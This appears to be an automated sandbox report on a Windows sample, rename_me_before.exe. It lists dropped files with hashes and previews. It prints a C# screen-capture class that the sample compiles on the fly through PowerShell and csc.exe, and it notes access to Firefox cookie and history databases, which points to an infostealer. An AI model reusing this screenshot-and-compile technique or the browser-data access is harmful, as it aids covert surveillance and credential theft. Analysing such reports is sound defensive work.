                                                                                                                                                                                                                                                          SHA-512:A080050B5D966303D2A27CAFCA8CBF83777329A54CA00BBB16EB547EEF4262C9FDF7C828CADB02E952AEB631EC560D1DCE3CF91F387A96DE9E82037F1C3AC47B
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........t.q|'.q|'.q|'...'.q|'q.}&.q|'q.y&.q|'q.x&.q|'q..&.q|'..}&.q|'.q}'.q|'..}&.q|'..q&.q|'..|&.q|'...'.q|'..~&.q|'Rich.q|'........PE..d......e.........." ...#.0................................................................`......................................... ...L....................`..............l...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI13962\sqlite3.dll

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):637720
                                                                                                                                                                                                                                                          Entropy (8bit):7.993300822314004
                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                          SSDEEP:12288:pevMEHnoed8VDT4Rc+iHsLG56RY+hPQHAnxeIglZsk2F24ZHL2Ubsi2V4G2:p8oy8x4Rl1dRnxeDlZxsl2MsDVr2
                                                                                                                                                                                                                                                          MD5:7219D265A3204344CE216344DE464920
                                                                                                                                                                                                                                                          SHA1:13E7B7980E17ED5A225B93FFB393F1BC7419AC2E
                                                                                                                                                                                                                                                          SHA-256:5821D8BD76212B57EEE95B7ECB5A8381D2FE24AE31164BE03F0F8BF13D5B86D4
                                                                                                                                                                                                                                                          SHA-512:D554C881073417DD03334521CA0AFC95716B1A9788E9EE1A0540CE3D7E53132F4EE511C10B05AB090909002294D9648D1D65E994C8D105BFF7142CDCCE1D4B77
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W..W..W..^.P.[....U....Z...._.....S.....T..W........V.....V....<.V......V..RichW..........................PE..d......e.........." ...#.`...0.......*.......................................p............`..........................................K..."...H.......@.......................m.......................................7..@...........................................UPX0....................................UPX1.....`.......Z..................@....rsrc....0...@.......^..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI13962\unicodedata.pyd

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):302872
                                                                                                                                                                                                                                                          Entropy (8bit):7.986782854548308
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6144:yk/Qvs7yfQJYx4x9UVqHDMDNCStEQc5YmDp9KiQ/y:ykUfQJbUV2MhCwEQc5Np9zQ6
                                                                                                                                                                                                                                                          MD5:660EF38D6DE71EB7E06C555B38C675B5
                                                                                                                                                                                                                                                          SHA1:944EC04D9B67D3F25D3FB448973C7AD180222BE3
                                                                                                                                                                                                                                                          SHA-256:FD746987AB1EA02B6568091040E8C5204FB599288977F8077A7B9ECEFDC5EDB4
                                                                                                                                                                                                                                                          SHA-512:26AC7D56E4FB02E43E049C9055979FC6E0E16FAB8F08F619233E12B278F300FAA5FFABAC1D9B71091571A89CDF9ACFEB3478508FBA96EF2E647327215BE6E9D7
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4m..4m..4m..=...2m......6m......9m......<m......7m......7m......6m..4m..em......5m......5m....j.5m......5m..Rich4m..................PE..d......e.........." ...#.`.......@.......P................................................`.............................................X....................P..0.......................................................@...........................................UPX0.....@..............................UPX1.....`...P...^..................@....rsrc................b..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI13962\yarl\_quoting_c.cp311-win_amd64.pyd

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):41472
                                                                                                                                                                                                                                                          Entropy (8bit):7.868227278889233
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:dU3TLuhvkAahe3LS0HW7A7I57CdTRgbaa34cU29pU:dCFs7S0HW07I57CBRgkcw
                                                                                                                                                                                                                                                          MD5:9A8F969ECDF0C15734C1D582D2AE35D8
                                                                                                                                                                                                                                                          SHA1:A40691E81982F610A062E49A5AD29CFFB5A2F5A8
                                                                                                                                                                                                                                                          SHA-256:874E52CCEAE9A3C967BAC7B628F4144C32E51FC77F519542FC1BAC19045ECDE8
                                                                                                                                                                                                                                                          SHA-512:E0DEB59ABEF7440F30EFFB1AAB6295B5A50C817F685BE30B21A3C453E3099B97FD71984E6CA6A6C6E0021ABB6E906838566F402B00A11813E67A4E00B119619F
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../]..A...A...A.......A...@...A..@...A...D...A...E...A...B...A.[.@...A...@.B.A..`I...A..`A...A..`....A..`C...A.Rich..A.................PE..d....Ype.........." ...%.........`.......p................................... ............`.............................................d...............................................................................@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_adzphgmy.vek.ps1

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h0clym3x.spo.psm1

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q4sddb5k.axe.ps1

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wcirmo2y.tpk.psm1

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\iqddoona\CSCE5D39DCC87804C2589D261464B53262.TMP

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                                          File Type:MSVC .res
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):652
                                                                                                                                                                                                                                                          Entropy (8bit):3.0730049765594893
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry9qGak7Ynqq8qXPN5Dlq5J:+RI+ycuZhNyGakSjXPNnqX
                                                                                                                                                                                                                                                          MD5:04E8F26F432EC94FFE8EED63E30E7DCC
                                                                                                                                                                                                                                                          SHA1:6CE77DC910461A7E7428599D9E8D0507474BFE9D
                                                                                                                                                                                                                                                          SHA-256:D71605F734D8CFDB58F64C2E277A079399E8475EF5FD2E0CD47B1FFB833C2D1F
                                                                                                                                                                                                                                                          SHA-512:6DBA8EFB1ACE08B024EFDF00C88AD42C9EB735EBD0FA3C1A61A18C55B8A45D51E7DE33FB1D1D7C89293CBC5E0FF87950F575D5BFD22127155D767A11ACB3C198
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.q.d.d.o.o.n.a...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...i.q.d.d.o.o.n.a...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.0.cs

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1004
                                                                                                                                                                                                                                                          Entropy (8bit):4.154581034278981
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                                                                                                                                                                                                                          MD5:C76055A0388B713A1EABE16130684DC3
                                                                                                                                                                                                                                                          SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                                                                                                                                                                                                                          SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                                                                                                                                                                                                                          SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.cmdline

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):607
                                                                                                                                                                                                                                                          Entropy (8bit):5.302207023022631
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:p37Lvkmb6KOkqe1xBkrk+ikOf5L0WZEif59H:V3ka6KOkqeFkOfjEif3
                                                                                                                                                                                                                                                          MD5:B4A3BC3A2E6C12756302D6A08156135F
                                                                                                                                                                                                                                                          SHA1:F35F08BC95C7B770DE3A0C5F8101E37F9E7403DB
                                                                                                                                                                                                                                                          SHA-256:85EED39F14FE8D83E7F6BB1112EE64928F1B84BF15D39601678BF81FBC453061
                                                                                                                                                                                                                                                          SHA-512:28C1995AA858DBAE51067B2FCB42EEC16EDDF35AF1A953C649B3F16620B1FDEBF2C9DBB159B842A5EEC4D51C55B03B60312708897D9ABA593CC4CF3247723681
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.0.cs"

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.dll

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4096
                                                                                                                                                                                                                                                          Entropy (8bit):3.152283754016436
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:647oEAtf0KhzBU/df6mtJ2N0fpW1ulla35q:oNz0kmeO/3K
                                                                                                                                                                                                                                                          MD5:9986D70705A2DC5B5C50A01DEABD7B65
                                                                                                                                                                                                                                                          SHA1:606163F5A966CE3AB6C5DE90B07095A1D3548A44
                                                                                                                                                                                                                                                          SHA-256:8D750E6C548994D3B7A85CBDCB30151A9ADD4AE2F3039E038BA6840565B14518
                                                                                                                                                                                                                                                          SHA-512:0A39A53579C16930D527AF16BB94BB00D222C3DF7AC4402183F807AF8346B3EAAB99A8326550F95889D6C2CE9C2B9D8212C9008ABD5988756E83200B691DB939
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....tg...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.out

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (734), with CRLF, CR line terminators
                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                          Size (bytes):1155
                                                                                                                                                                                                                                                          Entropy (8bit):5.449810011974728
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:KJfUId3ka6KOkqeFkOfjEif+Kax5DqBVKVrdFAMBJTH:uUkka6NkqeFkyjEu+K2DcVKdBJj
                                                                                                                                                                                                                                                          MD5:499208F60B4D2BC15560E2E69DDE8320
                                                                                                                                                                                                                                                          SHA1:039BF437AA1B85413BCE6C4CF61F681FE3E68DA9
                                                                                                                                                                                                                                                          SHA-256:1A14BDBBD338520C155F1A6D09359B0F474C6ED467FBF7C7BABA88713CA45AD7
                                                                                                                                                                                                                                                          SHA-512:3811014783B0794209510A5B24C46C0F83498B961536656B5336958F17194990220CC17BC92C6A22FC456DA90D3247997E4F728C71A0C1938FE241082D2F7F46
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:.C:\Users\user\AppData\Local\Temp\71434D56-1548-ED3D-AEE6-C75AECD93BF0> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\pfo4_7b_

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4
                                                                                                                                                                                                                                                          Entropy (8bit):2.0
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:qn:qn
                                                                                                                                                                                                                                                          MD5:3F1D1D8D87177D3D8D897D7E421F84D6
                                                                                                                                                                                                                                                          SHA1:DD082D742A5CB751290F1DB2BD519C286AA86D95
                                                                                                                                                                                                                                                          SHA-256:F02285FB90ED8C81531FE78CF4E2ABB68A62BE73EE7D317623E2C3E3AEFDFFF2
                                                                                                                                                                                                                                                          SHA-512:2AE2B3936F31756332CA7A4B877D18F3FCC50E41E9472B5CD45A70BEA82E29A0FA956EE6A9EE0E02F23D9DB56B41D19CB51D88AAC06E9C923A820A21023752A9
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:blat

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                                                                          Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                                                                          Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):55
                                                                                                                                                                                                                                                          Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                                                                                                          Static File Info

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Entropy (8bit):7.996640205330543
                                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                                          • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                                                                          • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                          File name:rename_me_before.exe
                                                                                                                                                                                                                                                          File size:11'803'970 bytes
                                                                                                                                                                                                                                                          MD5:8b8040d5875e4c41ed5091f92021a16b
                                                                                                                                                                                                                                                          SHA1:4ebb7b91e64a7193b61a0e1405847ed13563f7d5
                                                                                                                                                                                                                                                          SHA256:7e7597691235f0ff8a8df29ee3e54ea7a69b43b4ef727adf511e7aec749dc68a
                                                                                                                                                                                                                                                          SHA512:4703f8ad9543f2aa47a1c964e13c7bad48a593284d53baac3581d6b584e63cad5c88afe6aca2c8f2c708369e757b2cd150b95247c01bfd8b58d6915fed524a7a
                                                                                                                                                                                                                                                          SSDEEP:196608:AUC1IYDEmmtSBLjv+bhqNVobZ1Uh8mAIv9P5jQ1KJEaKOlx:TC+OEZtSZL+9qzGZeII3MCCOlx
                                                                                                                                                                                                                                                          TLSH:0BC6332893E40AF6FD6B54399246C566DB3339620BB1E8CB53FC862A2F035D1DC36B51
                                                                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Xhc.Xhc.Xhc...`._hc...f..hc...g.Rhc.....[hc...`.Qhc...g.Ihc...f.phc...b.Shc.Xhb..hc.K.g.Ahc.K.a.Yhc.RichXhc.........PE..d..

                                                                                                                                                                                                                                                          File Icon

